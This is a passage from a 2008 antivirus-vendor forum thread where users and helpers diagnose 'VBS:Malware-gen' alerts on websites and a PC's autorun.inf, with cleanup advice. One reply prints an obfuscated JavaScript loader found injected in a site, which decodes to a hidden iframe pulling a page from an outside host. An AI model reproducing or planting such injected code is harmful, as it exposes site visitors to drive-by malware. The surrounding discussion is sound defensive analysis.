Author Topic: VBS:Malware-gen (Read 198612 times)

Lisandro · « **Reply #165 on:** September 27, 2008, 08:26:07 PM »

Quote from: DavidR on September 27, 2008, 05:50:55 PM

This one especially looks very suspicious

Thanks... I've quite confident that something was cheesy...

DavidR · « **Reply #166 on:** September 27, 2008, 08:35:41 PM »

It might be totally benign, but with that level of obfuscation you have to wonder why they need to do that.

Or if they are even aware of that last <script> after all of the HTML code, when by convention (wc3 standards) all code with the exception document type information should be between the opening and closing HTML tags. This script is outside those tags and that is also suspicious and given the added obfuscation, more so.

So whoever was communicating with the webmaster should point that out too.

pedro1612 · « **Reply #167 on:** September 30, 2008, 02:57:45 AM »

about freecoolsite... with new version the problem has ended

!

DavidR · « **Reply #168 on:** September 30, 2008, 02:44:41 PM »

Thanks for the update.

Casaboontha · « **Reply #169 on:** October 04, 2008, 02:57:51 PM »

Quote from: DavidR on September 27, 2008, 05:50:55 PM

Quote from: Casaboontha on September 27, 2008, 03:32:57 PM
site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229

I have had a look at this page and there are several batches of javascript that could be making avast alert as the code appears obfuscated and avast isn't alone in detecting something, see http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b.

Like this
Code: [Select]
<script language='JavaScript' type='text/javascript'> \n </script>
I haven't enough experience to know what is trying to be achieved but it isn't clear (javascript is a plain language) what is going on and this 'could' be the reason.

This one especially looks very suspicious, I have broken down the single line of code (as it would be huge) into something easier to read.
Code: [Select]
<script type="text/javascript"> function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC){var BABAC8D053646DAAEED97=16; return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));} function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC) {function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;return A22AFFBCBE863863A1B64DF;}var A01766E6154626B4="";for(E846AAB0F24560E5FDD=0; E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length; E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+= (String.fromCharCode(BFD6F5DD5DB451E605DC93C1C (AF1EAFAE6DA9EFFC64209858078EBFBC.substr(E846AAB0F24560E5FDD, FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);} EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F7 66965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D312 06865696768743D31207374796C653D227669736962696C6974793A68696464656E3B70 6F736974696F6E3A6162736F6C757465223E3C2F696672616D653E"); </script>

Many thanks, will have a look into the code.

DavidR · « **Reply #170 on:** October 04, 2008, 03:47:12 PM »

You're welcome, happy hunting.

A belated welcome to the forums.

mais · « **Reply #171 on:** October 07, 2008, 11:02:14 AM »

Hi,
i have this warning with avast on one of my site : sign of "VBS:Malware-gen" has been found in "http://www.ictraona.it" but i looking for every kind of malware codes in php or html files and there's nothing malicious. Can is it a fake warning?

my version

081006-0,06/10

Thanks.

Ciao

kubecj · « **Reply #172 on:** October 07, 2008, 11:26:13 AM »

Encrypted hidden iframe at the beginning leading to xxxmovies.dip.jp...
Definitely does not look like a false.

Lisandro · « **Reply #173 on:** October 07, 2008, 02:10:28 PM »

kubecj, are there legit uses of encrypted iframes or not? I mean, does avast detect any encrypted iframe or scans and separate the good from the bad ones?

kubecj · « **Reply #174 on:** October 07, 2008, 02:13:36 PM »

I would never encrypt such a simple thing. But people are strange

Right now we don't detect all encrypted iframes as bad. But, that may change in the future.

Lisandro · « **Reply #175 on:** October 07, 2008, 02:15:55 PM »

Quote from: kubecj on October 07, 2008, 02:13:36 PM

I would never encrypt such a simple thing. But people are strange
Right now we don't detect all encrypted iframes as bad. But, that may change in the future.

Thanks. Living and learning with you...

DavidR · « **Reply #176 on:** October 07, 2008, 04:18:26 PM »

I take it that mais has been in and found that encrypted iframe and removed it as the link is no longer detected.

Edward Gan · « **Reply #177 on:** October 28, 2008, 10:04:00 AM »

Hi Guys, I need help with this as I keep getting the alarm for the following.

File Name : C:\autorun.inf
Malware Name : VBS:Malware-GEN
VPS Version : 081027-1, 10/27/2008

It starts the minute i turn the pc on and i cannot seem to get it off the even though I tried scanning it in safe mode and all.

Please advise

Lisandro · « **Reply #178 on:** October 28, 2008, 12:08:39 PM »

Are you using Windows XP/Vista?
Can you schedule a boot-time scanning?
Start avast! > Right click the skin > Schedule a boot-time scanning.
Select for scanning archives.
Boot.
If infected files are found, it's safer to send them to Chest instead of deleting them.
This way you can further analysis them.

DavidR · « **Reply #179 on:** October 28, 2008, 01:59:48 PM »

There shouldn't be a autorun.inf on any hard disk partition, it is a file usually associated with removable media like a CD to start the CD running.

So with autorun.inf in a HDD partition, it indicates that your system has been infected most likely from a usb flash drive, do you have a USB flash drive ?

The autorun.inf will contain run commands for files also on your system (and probably undetected), so I would ask you to open this file with notepad and copy and paste the contents of the file here. You will need to pause the standard shield to be able to open this with notepad, enable the standard shield after you have copied the contents and closed the autorun.inf file.

There is most likely a location for a file that it is trying to run, see if you can find this file and upload it to virustotal, see below, for scanning.

Check the offending/suspect file at: VirusTotal - Multi engine on-line virus scanner and report the findings here. You can't do this with the file securely in the chest, you need to extract it to a temporary (not original) location first, see below.

Create a folder called Suspect in the C:\ drive, e.g. C:\Suspect. Now exclude that folder in the Standard Shield, Customize, Advanced, Add, type (or copy and paste) C:\Suspect\* That will stop the standard shield scanning any file you put in that folder. You should now be able to export any file in the chest to this folder and upload it to VirusTotal without avast alerting.

If it is detected by multiple scanners but not avast send the sample to avast...
Send the sample to virus@avast.com zipped and password protected with the password in email body, a link to this topic might help and undetected malware in the subject.

Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there (select the file, right click, email to Alwil Software). No need to zip and PW protect when the sample is sent from chest. A copy of the file/s will remain in the original location, so any further action you take can remove that.

Author Topic: VBS:Malware-gen (Read 198612 times)

Lisandro

Re: VBS:Malware-gen

DavidR

Re: VBS:Malware-gen

pedro1612

Re: VBS:Malware-gen

DavidR

Re: VBS:Malware-gen

Casaboontha

Re: VBS:Malware-gen

DavidR

Re: VBS:Malware-gen

mais

Re: VBS:Malware-gen

kubecj

Re: VBS:Malware-gen

Lisandro

Re: VBS:Malware-gen

kubecj

Re: VBS:Malware-gen

Lisandro

Re: VBS:Malware-gen

DavidR

Re: VBS:Malware-gen

Edward Gan

Re: VBS:Malware-gen

Lisandro

Re: VBS:Malware-gen

DavidR

Re: VBS:Malware-gen